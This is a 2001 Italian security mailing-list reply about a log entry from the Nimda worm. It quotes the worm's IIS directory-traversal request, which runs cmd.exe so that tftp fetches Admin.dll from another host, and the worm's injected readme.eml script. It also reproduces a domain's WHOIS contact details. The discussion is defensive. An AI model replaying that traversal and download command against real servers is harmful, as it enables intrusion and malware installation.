Re: Un saluto e domandina

On Mon, Sep 24, 2001 at 04:31:56PM +0200, Ste wrote:
> Ciao a tutti, trovo ultimamente, sempre piu' spesso nei log, questa riga:
> 
> oops_id	oops_url	oops_ip	oops_date	oops_durl
> 902190	 	151.4.121.7	24/09/2001 14.45.00 
> #?404;http://www/scripts/..S5c../winnt/system32/cmd.exe?/c tftp -i 
> 151.4.121.11 GET Admin.dll e:\Admin.dll
> 
> che devo fare? il signor 151.4.121.7, esiste, è vero e posso torturarlo?
> grazie a chi mi da una rispostina

Il signor 151.4.121.7, probabilmente sara' infetto da un qualche simpatico e
non ha la benche' minima idea del fastidio che ti sta causando.

E' infetto dal buon worm 'Nimda' come si vede dal suo index.html:

naif@naif:~$ lynx --source 151.4.121.7|grep readme.eml
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

Facendo un whois per il dominio presente nell'index.html ( RACINGCAMERAS.COM )
troviamo i contatti amministrativi.
Contatta la persona, avvertendola del problema, e spiegandole nel modo piu'
chiaro possibile la soluzione.

   Administrative Contact, Technical Contact, Billing Contact:
      Dante, Cecchin  (CD6183)  info@THEMOVIEFACTORY.COM
      THE MOVIE FACTORY
      Via Flaminia Vecchia 495
      Roma
      RM
      00191
      IT
      +39-06-3332368 (FAX) +39-06-33221845


Saluti

-- 

Fabio Pietrosanti ( naif )
E-mail: naif@sikurezza.org - naif@blackhats.it
PGP Key (DSS) http://naif.itapac.net/naif.asc
--
Free advertising: www.openbsd.org Multiplatform Ultra-secure OS
Free Flame: IPFilter sucks ! 

________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List